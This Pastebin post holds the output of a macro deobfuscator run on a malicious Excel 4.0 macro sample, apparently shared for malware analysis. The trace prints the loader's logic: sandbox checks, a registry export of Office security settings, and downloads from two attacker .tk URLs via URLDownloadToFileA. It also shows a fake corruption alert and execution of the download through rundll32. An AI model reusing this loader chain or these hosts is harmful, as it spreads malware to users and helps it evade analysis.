Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Deobfuscated by: https://github.com/DissectMalware/XLMMacroDeobfuscator
- sample: https://app.any.run/tasks/b5ef8297-5a4d-46dd-9e01-89e4999cdb6e/
- sample ref: https://twitter.com/reecdeep/status/1263145785119707136
- [Loading Cells]
- auto_open: auto_open->Sheet2!$GV$18838
- [Starting Deobfuscation]
- CELL:GV18838 , FullEvaluation ,SET.VALUE(Sheet2!AW38694,"-39")
- CELL:GV18839 , FullEvaluation ,GOTO(HJ43843)
- CELL:HJ43843 , FullEvaluation ,SET.VALUE(Sheet2!HB21318,"19")
- CELL:HJ43844 , FullEvaluation ,RUN(Sheet2!EE50653)
- CELL:EE50653 , FullEvaluation ,SET.VALUE(Sheet2!HQ33119,"-118")
- CELL:EE50654 , FullEvaluation ,GOTO(HB65366)
- CELL:HB65366 , FullEvaluation ,SET.VALUE(Sheet2!GI30540,"38")
- CELL:HB65367 , FullEvaluation ,RUN(Sheet2!IB44586)
- CELL:IB44586 , FullEvaluation ,SET.VALUE(Sheet2!AO25178,"-888.8")
- CELL:IB44587 , FullEvaluation ,RUN(Sheet2!AM3080)
- CELL:AM3080 , FullEvaluation ,SET.VALUE(Sheet2!DM7968,"163")
- CELL:AM3081 , FullEvaluation ,GOTO(GZ7209)
- CELL:GZ7209 , FullEvaluation ,SET.VALUE(Sheet2!CS62471,"162")
- CELL:GZ7210 , FullEvaluation ,RUN(Sheet2!HS55235)
- CELL:HS55235 , FullEvaluation ,SET.VALUE(Sheet2!HK38885,"-115")
- CELL:HS55236 , FullEvaluation ,RUN(Sheet2!HR16144)
- CELL:HR16144 , FullEvaluation ,SET.VALUE(Sheet2!FV62574,"434")
- CELL:HR16145 , FullEvaluation ,RUN(Sheet2!A64064)
- CELL:A64064 , FullEvaluation ,SET.VALUE(Sheet2!V36648,"250")
- CELL:A64065 , FullEvaluation ,GOTO(DW5659)
- CELL:DW5659 , FullEvaluation ,FORMULA("=CLOSE(FALSE)",Sheet2!BY37267)
- CELL:DW5660 , FullEvaluation ,RUN(Sheet2!HS39528)
- CELL:HS39528 , FullEvaluation ,FORMULA("=APP.MAXIMIZE()",Sheet2!HS39529)
- CELL:HS39529 , NotImplemented ,APP.MAXIMIZE()
- CELL:HS39530 , FullEvaluation ,RUN(Sheet2!GC13846)
- CELL:GC13846 , FullEvaluation ,FORMULA("=IF(GET.WINDOW(7),GOTO(R[23420]C[-108]),)",Sheet2!GC13847)
- CELL:GC13847 , FullEvaluation ,IF(GET.WINDOW(7),GOTO(R[23420]C[-108]),)
- CELL:GC13848 , FullEvaluation , RUN(Sheet2!IH62193)
- CELL:IH62193 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-24927]C[-165]))",Sheet2!IH62194)
- CELL:IH62194 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-24927]C[-165]))
- CELL:IH62195 , FullEvaluation , RUN(Sheet2!HS14490)
- CELL:HS14490 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[22776]C[-150]),)",Sheet2!HS14491)
- CELL:HS14491 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[22776]C[-150]),)
- CELL:HS14492 , FullEvaluation , RUN(Sheet2!IR14879)
- CELL:IR14879 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[22387]C[-175]),)",Sheet2!IR14880)
- CELL:IR14880 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[22387]C[-175]),)
- CELL:IR14881 , FullEvaluation , RUN(Sheet2!BV65087)
- CELL:BV65087 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[-27821]C[3]),)",Sheet2!BV65088)
- CELL:BV65088 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[-27821]C[3]),)
- CELL:BV65088 , FullEvaluation , [TRUE] GOTO(R[-27821]C[3])
- CELL:BY37267 , End , CLOSE(FALSE)
- CELL:BV65088 , FullEvaluation , [FALSE]
- CELL:BV65089 , FullEvaluation , RUN(Sheet2!I45396)
- CELL:I45396 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[-8130]C[68]),)",Sheet2!I45397)
- CELL:I45397 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[-8130]C[68]),)
- CELL:I45397 , FullEvaluation , [TRUE] GOTO(R[-8130]C[68])
- CELL:BY37267 , End , CLOSE(FALSE)
- CELL:I45397 , FullEvaluation , [FALSE]
- CELL:I45398 , FullEvaluation , GOTO(N29331)
- CELL:N29331 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[7935]C[63]))",Sheet2!N29332)
- CELL:N29332 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[7935]C[63]))
- CELL:N29333 , FullEvaluation , RUN(Sheet2!DK27988)
- CELL:DK27988 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[9278]C[-38]))",Sheet2!DK27989)
- CELL:DK27989 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[9278]C[-38]))
- CELL:DK27990 , FullEvaluation , RUN(Sheet2!E4390)
- CELL:E4390 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[32876]C[72]))",Sheet2!E4391)
- CELL:E4391 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[32876]C[72]))
- CELL:E4392 , FullEvaluation , GOTO(M44930)
- CELL:M44930 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!HV21820)
- CELL:M44931 , FullEvaluation , GOTO(CR48643)
- CELL:CR48643 , FullEvaluation , FORMULA("=""C:\Users\Public\nSy0P.reg""",Sheet2!HZ40705)
- CELL:CR48644 , FullEvaluation , GOTO(HV51866)
- CELL:HV51866 , FullEvaluation , FORMULA("=R[3762]C[-1]&GET.WORKSPACE(2)&""\Excel\Security ""&R[22647]C[3]&"" /y""",Sheet2!HW18058)
- CELL:HV51867 , FullEvaluation , GOTO(FM56636)
- CELL:FM56636 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",Sheet2!ET24206)
- CELL:FM56637 , FullEvaluation , GOTO(BE53453)
- CELL:BE53453 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-29248]C[93],R[-35396]C[174],0,5)",Sheet2!BE53454)
- CELL:BE53454 , NotImplemented , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",BD57216GET.WORKSPACE(2)\Excel\Security BH76101 /y,0,5)
- CELL:BE53455 , FullEvaluation , RUN(Sheet2!FA60753)
- CELL:FA60753 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[-20051]C[77])))",Sheet2!FA60756)
- CELL:FA60754 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",Sheet2!FA60757)
- CELL:FA60755 , FullEvaluation , FORMULA("=NEXT()",Sheet2!FA60758)
- CELL:FA60756 , PartialEvaluation , WHILE("C:\Users\Public\nSy0P.reg")
- CELL:FA60757 , PartialEvaluation , WAIT(NOW()+"00:00:01")
- CELL:FA60758 , PartialEvaluation , NEXT()
- CELL:FA60759 , FullEvaluation , GOTO(DO43860)
- CELL:DO43860 , FullEvaluation , FORMULA("=FOPEN(R[-3156]C[115])",Sheet2!DO43861)
- CELL:DO43861 , PartialEvaluation , FOPEN("C:\Users\Public\nSy0P.reg")
- CELL:DO43862 , FullEvaluation , GOTO(HE5978)
- CELL:HE5978 , FullEvaluation , FORMULA("=FPOS(R[37882]C[-94],215)",Sheet2!HE5979)
- CELL:HE5979 , PartialEvaluation , FPOS("""C:\Users\Public\nSy0P.reg""",215)
- CELL:HE5980 , FullEvaluation , RUN(Sheet2!HN27507)
- CELL:HN27507 , FullEvaluation , FORMULA("=FREAD(R[16353]C[-103],255)",Sheet2!HN27508)
- CELL:HN27508 , PartialEvaluation , FREAD("""C:\Users\Public\nSy0P.reg""",255)
- CELL:HN27509 , FullEvaluation , RUN(Sheet2!HD24312)
- CELL:HD24312 , FullEvaluation , FORMULA("=FCLOSE(R[19548]C[-93])",Sheet2!HD24313)
- CELL:HD24313 , PartialEvaluation , FCLOSE("""C:\Users\Public\nSy0P.reg""")
- CELL:HD24314 , FullEvaluation , GOTO(F14533)
- CELL:F14533 , FullEvaluation , FORMULA("=FILE.DELETE(R[26171]C[228])",Sheet2!F14534)
- CELL:F14534 , NotImplemented , FILE.DELETE(R[26171]C[228])
- CELL:F14535 , FullEvaluation , RUN(Sheet2!GP55286)
- CELL:GP55286 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-27779]C[24])),GOTO(R[-18020]C[-121]),)",Sheet2!GP55287)
- CELL:GP55287 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-27779]C[24])),GOTO(R[-18020]C[-121]),)
- CELL:GP55288 , FullEvaluation , GOTO(BL55760)
- CELL:BL55760 , FullEvaluation , FORMULA("=""C:\Users\Public\C44zPD.html""",Sheet2!X34640)
- CELL:BL55761 , FullEvaluation , RUN(Sheet2!D53822)
- CELL:D53822 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!DP30771)
- CELL:D53823 , FullEvaluation , RUN(Sheet2!EP30832)
- CELL:EP30832 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-62]C[-26],R[3807]C[-122],0,0)",Sheet2!EP30833)
- CELL:EP30833 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\C44zPD.html",0,0)
- CELL:EP30834 , FullEvaluation , GOTO(HO40398)
- CELL:HO40398 , FullEvaluation , FORMULA("=FILES(R[-5759]C[-199])",Sheet2!HO40399)
- CELL:HO40399 , PartialEvaluation , FILES("C:\Users\Public\C44zPD.html")
- CELL:HO40400 , FullEvaluation , GOTO(AD45249)
- CELL:AD45249 , FullEvaluation , FORMULA("=IF(ISERROR(R[-4851]C[193]),GOTO(R[-7983]C[47]),)",Sheet2!AD45250)
- CELL:AD45250 , FullBranching , IF(ISERROR(R[-4851]C[193]),GOTO(R[-7983]C[47]),)
- CELL:AD45250 , FullEvaluation , [TRUE] GOTO(R[-7983]C[47])
- CELL:BY37267 , End , CLOSE(FALSE)
- CELL:AD45250 , FullEvaluation , [FALSE]
- CELL:AD45251 , FullEvaluation , GOTO(H25154)
- CELL:H25154 , FullEvaluation , SET.VALUE(Sheet2!FQ30497,"167")
- CELL:H25155 , FullEvaluation , RUN(Sheet2!FJ54370)
- CELL:FJ54370 , FullEvaluation , SET.VALUE(Sheet2!GQ23117,"112")
- CELL:FJ54371 , FullEvaluation , GOTO(E43845)
- CELL:E43845 , FullEvaluation , SET.VALUE(Sheet2!BF9812,"-421")
- CELL:E43846 , FullEvaluation , RUN(Sheet2!EV4466)
- CELL:EV4466 , FullEvaluation , SET.VALUE(Sheet2!GH41243,"275")
- CELL:EV4467 , FullEvaluation , GOTO(HC59670)
- CELL:HC59670 , FullEvaluation , SET.VALUE(Sheet2!DP53696,"44")
- CELL:HC59671 , FullEvaluation , GOTO(HU50919)
- CELL:HU50919 , FullEvaluation , SET.VALUE(Sheet2!Y3396,"-499")
- CELL:HU50920 , FullEvaluation , GOTO(BU42078)
- CELL:BU42078 , FullEvaluation , SET.VALUE(Sheet2!AE6901,"417")
- CELL:BU42079 , FullEvaluation , GOTO(BU33894)
- CELL:BU33894 , FullEvaluation , SET.VALUE(Sheet2!FB46077,"-495")
- CELL:BU33895 , FullEvaluation , GOTO(EC7952)
- CELL:EC7952 , FullEvaluation , SET.VALUE(Sheet2!FZ33527,"-179")
- CELL:EC7953 , FullEvaluation , GOTO(DA25067)
- CELL:DA25067 , FullEvaluation , SET.VALUE(Sheet2!IN320,"-489")
- CELL:DA25068 , FullEvaluation , GOTO(GF6215)
- CELL:GF6215 , FullEvaluation , FORMULA("=""C:\Users\Public\SN5uF.html""",Sheet2!AG54847)
- CELL:GF6216 , FullEvaluation , RUN(Sheet2!BE39499)
- CELL:BE39499 , FullEvaluation , FORMULA("=""https://arunruntuchattcar.tk/56hgfbcx.php""",Sheet2!H52699)
- CELL:BE39500 , FullEvaluation , GOTO(N31781)
- CELL:N31781 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[52591]C[-135],R[54739]C[-110],0,0)",Sheet2!EM108)
- CELL:N31782 , FullEvaluation , GOTO(HQ393)
- CELL:HQ393 , FullEvaluation , FORMULA("=FILES(R[25754]C[-174])",Sheet2!GY29093)
- CELL:HQ394 , FullEvaluation , RUN(Sheet2!AG4385)
- CELL:AG4385 , FullEvaluation , FORMULA("=IF(ISERROR(R[5875]C[83]),,RUN(R[-31]C[21]))",Sheet2!DT23218)
- CELL:AG4386 , FullEvaluation , RUN(Sheet2!BZ8150)
- CELL:BZ8150 , FullEvaluation , FORMULA("=""https://krisithcomdebe.tk/56hgfbcx.php""",Sheet2!ED29365)
- CELL:BZ8151 , FullEvaluation , GOTO(HA28272)
- CELL:HA28272 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-32699]C[-116],R[-7217]C[-217],0,0)",Sheet2!IP62064)
- CELL:HA28273 , FullEvaluation , RUN(Sheet2!DS62361)
- CELL:DS62361 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",Sheet2!BL52177)
- CELL:DS62362 , FullEvaluation , GOTO(AH30663)
- CELL:AH30663 , FullEvaluation , FORMULA("=ALERT(R[28990]C[-81])",Sheet2!EO23187)
- CELL:AH30664 , FullEvaluation , RUN(Sheet2!DG5222)
- CELL:DG5222 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",Sheet2!BI22211)
- CELL:DG5223 , FullEvaluation , GOTO(AL34640)
- CELL:AL34640 , FullEvaluation , FORMULA("=R[51958]C[-193]&"",DllRegisterServer""",Sheet2!HR2889)
- CELL:AL34641 , FullEvaluation , RUN(Sheet2!HP13960)
- CELL:HP13960 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-7044]C[-156],R[-26366]C[9],0,5)",Sheet2!HI29255)
- CELL:HP13961 , FullEvaluation , GOTO(EM108)
- CELL:EM108 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://arunruntuchattcar.tk/56hgfbcx.php","C:\Users\Public\SN5uF.html",0,0)
- CELL:EM109 , FullEvaluation , GOTO(GY29093)
- CELL:GY29093 , PartialEvaluation , FILES("C:\Users\Public\SN5uF.html")
- CELL:GY29094 , FullEvaluation , RUN(Sheet2!DT23218)
- CELL:DT23218 , FullBranching , IF(ISERROR(R[5875]C[83]),,RUN(R[-31]C[21]))
- CELL:DT23218 , FullEvaluation , [TRUE]
- CELL:DT23219 , FullEvaluation , GOTO(ED29365)
- CELL:ED29365 , FullEvaluation , "https://krisithcomdebe.tk/56hgfbcx.php"
- CELL:ED29366 , FullEvaluation , RUN(Sheet2!IP62064)
- CELL:IP62064 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"""https://krisithcomdebe.tk/56hgfbcx.php""","C:\Users\Public\SN5uF.html",0,0)
- CELL:IP62065 , FullEvaluation , RUN(Sheet2!BL52177)
- CELL:BL52177 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:BL52178 , FullEvaluation , RUN(Sheet2!EO23187)
- CELL:EO23187 , PartialEvaluation , ALERT("""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
- CELL:EO23188 , FullEvaluation , RUN(Sheet2!BI22211)
- CELL:BI22211 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:BI22212 , FullEvaluation , GOTO(HR2889)
- CELL:HR2889 , FullEvaluation , C:\Users\Public\SN5uF.html,DllRegisterServer
- CELL:HR2890 , FullEvaluation , GOTO(HI29255)
- CELL:HI29255 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\SN5uF.html,DllRegisterServer",0,5)
- CELL:HI29256 , FullEvaluation , GOTO(BY37267)
- CELL:BY37267 , End , CLOSE(FALSE)
- CELL:DT23218 , FullEvaluation , [FALSE] RUN(Sheet2!EO23187)
- CELL:EO23187 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:EO23188 , FullEvaluation , RUN(Sheet2!BI22211)
- CELL:BI22211 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:BI22212 , FullEvaluation , GOTO(HR2889)
- CELL:HR2889 , FullEvaluation , C:\Users\Public\SN5uF.html,DllRegisterServer
- CELL:HR2890 , FullEvaluation , GOTO(HI29255)
- CELL:HI29255 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","""C:\Windows\system32\rundll32.exe""","C:\Users\Public\SN5uF.html,DllRegisterServer",0,5)
- CELL:HI29256 , FullEvaluation , GOTO(BY37267)
- CELL:BY37267 , End , CLOSE(FALSE)
- time elapsed: 5.366301536560059
Add Comment
Please, Sign In to add comment